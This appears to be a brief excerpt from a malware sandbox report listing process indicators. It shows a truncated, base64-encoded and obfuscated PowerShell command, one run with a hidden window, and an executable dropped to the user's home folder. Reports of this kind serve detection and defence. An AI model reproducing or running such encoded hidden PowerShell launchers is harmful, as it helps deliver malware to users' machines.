Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAG8AaQBjAGcAZQBvAGMAaAA9ACcAbQBpAG8AbAB5AHUAYQBiAHYAYQB1AG4AJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAdQByAGAASQB0AHkAYABwAHIAYABPAFQAbwBjAG...
- %HOMEPATH%\700.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAG8AaQBjAGcAZQBvAGMAaAA9ACcAbQBpAG8AbAB5AHUAYQBiAHYAYQB1AG4AJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAdQByAGAASQB0AHkAYABwAHIAYABPAFQAbwBjAG...' (with hidden window)